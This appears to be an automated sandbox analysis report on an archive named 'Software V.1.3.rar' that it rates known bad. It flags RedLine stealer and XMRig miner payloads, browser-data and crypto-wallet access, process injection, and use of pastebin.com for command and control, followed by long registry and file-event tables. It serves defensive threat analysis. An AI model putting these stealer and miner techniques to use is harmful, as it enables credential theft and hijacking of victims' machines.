Analysis Overview
SHA256
967a6b87a65bca9a7afaaaff6d0ca8870daeed5cfd50c7e8df607c33440f9caa
Threat Level: Known bad
The file Software V.1.3.rar was found to be: Known bad.
Malicious Activity Summary
RedLine payload
xmrig
RedLine
XMRig Miner payload
Downloads MZ/PE file
Event Triggered Execution: Component Object Model Hijacking
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Power Settings
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in Program Files directory
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Suspicious use of WriteProcessMemory
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Scheduled Task/Job: Scheduled Task
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
NTFS ADS
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-12 20:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-12 20:58
Reported
2024-07-12 21:09
Platform
win10v2004-20240709-en
Max time kernel
600s
Max time network
600s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\conhost.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3164 set thread context of 2096 | N/A | C:\Users\Admin\Desktop\Software V.1.3\Software V.1.3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\co.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\io.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ug.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\descript.ion | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\br.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\it.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fur.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-cn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\cy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eo.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zG.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lv.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt-br.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ast.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\et.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip32.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\af.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\de.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\th.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz-cyrl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\an.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ky.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ja.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kaa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ms.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ru.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fa.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\License.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\is.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ku-ckb.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.chm | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lij.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\zh-tw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000020000000300000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\SniffedFolderType = "Generic" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "13" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\MRUListEx = ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 01000000030000000200000000000000ffffffff | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000000add0ac508d2da01f8e293969ed4da01f8e293969ed4da0114000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe100000000add0ac508d2da01a0c453700dd2da01287150f09ed4da0114000000 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
